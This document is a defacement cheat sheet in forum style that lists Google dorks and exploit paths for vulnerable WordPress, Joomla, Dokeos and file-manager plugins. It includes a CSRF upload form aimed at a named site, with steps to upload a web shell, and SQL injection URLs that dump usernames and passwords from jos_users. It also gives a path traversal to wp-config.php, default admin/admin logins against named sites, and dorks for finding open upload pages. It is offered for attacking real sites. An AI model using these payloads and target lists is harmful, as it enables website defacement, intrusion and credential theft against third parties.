Error

Deface with Plugins Reflex Gallery
--------------------------------------------------------------------
- Dork : inurl:/wp-content/plugins/reflex-gallery/
- Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
- Vuln : {"error":"No files were uploaded."}
- Site Vuln : http://sjoyster.com/
- Script CSRF :
<html>
<title>Reflex-Gallery CSRF</title>
<form method="POST" action="http://straightlineinspection.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" >

    <input type="file" name="qqfile"><br>

    <input type="submit" name="Submit" value="Pwn!">

</form>
</html>
----------------------------------------------------------------------

Okay Lets Go to Tutorial

- Save script CSRF [ reflex.html ]
- Change The Site , to site Vuln
- Save
- Chek The Vuln
- Oh yeah , that vuln :D
- Open The Script in the Browser
- Upload your shell
- bcc.php is my shell :)
- Click " Pwn!"
- Succses :D
- Open your Shell in the :
[ site.com/wp-content/uploads/shell.php

- T R A C Y

++--+-+-+2exploit+-+/-+-+-/
# Exploit: /index.php?option=com_spidercalendar&calendar_id=1
----
Exploit : http://web/wp-content/plugins/revslider/temp/update_extract/exp.php

Dork :

inurl:wp-content/plugins/revslider/

inurl:revslider

inurl:revslider_admin.php

inurl:revslider_front.php

inurl:plugins/revslider/

intext:Powered by Revslider

intitle:"Index Of/ revslider"

intitle:"Index Of/wp-content/themes/revslider"

intitle:"Index Of/wp-content/plugins/revslider"

intitle:"Index Of/admin/revslider"

intitle:"Index Of/fr/revslider"

intitle:"Index Of/en/revslider"

intitle:"Index Of/us/revslider"

intitle:"Index Of/ar/revslider"

intitle:"Index Of/es/revslider"

intitle:"Index Of/de/revslider"
-----
Easy-exploit-joomla-Sites
Dork:inurl:"index.php?option=com_simplephotogallery"


/index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11,12+from+jos_users--+
-----
Joomla Components (com_ignitegallery) SQL-Injection Vulnerabilities -

Dorks: inurl:com_ignitegallery , Exploits: /index.php?
option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)UAH,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
-----
Joomla Exploit : com maian15

Dork : "inurl:option=com_maian15"

Exploit:

/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
-----
Deface Metode Wordpress bazar Theme Arbitrary File Download Vulnerability

Dork: inurl:wp-content/themes/bazar/
exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
-----
exploit bypass admin
inurl
allinurl:galimg
inurl:galorg
index of /galorg site:ae
target
http://mspmt.com/adminaccess/welcome.asp
http://www.extrememarineme.com/adminaccess/welcome.asp
add
adminaccess/welcome.asp
user=admin pass=admin
adminaccess/gallery.aspx
upload your shell
http://mspmt.com/
-----
Upload dork and exploit :3
Dorks :

inurl:/upload.php
inurl /uploadbutton.html
inurl /upload-form.php
inurl /upload/up.php
inurl /upload.html
-----
Dokeos Upload
😊😊😊😊
Dork:inurl:/index.php?include=Overview.html
Exploit:/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
-----😊😊😊😊
Dork : inurl:"admin/my_documents/my_files"
Exploit : admin/rte_popup_file_atch.asp
-----
Dork:inurl:"/mfm.php"
-----
Dork:intitle:"index of" people.lst.

dork : "Webdesign by: basicamente.pt"

[ Sitetarget.com/filemanager/dialog.php ] Upload Your File. Ur file [Sitetarget.com/uploads/yourfile.html]
http://www.koochecinema.com/ckfinder/ckfinder.html


# 1:Search Google Dork and Choose a Target Dork : inurl:viewtable?cid= site:it # 2: exploit: /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 # 3: upload shell.php or index.html

Exploit:  /admin/include/download.php?path=../config/&file=database.php

[+] Dork: inurl:sele.php


DORK :

"Webdesign by: criativo.net"
"Webdesign by: risema.pt"
"Webdesign by: basicamente.pt"

EXPLOIT :

/filemanager/dialog.php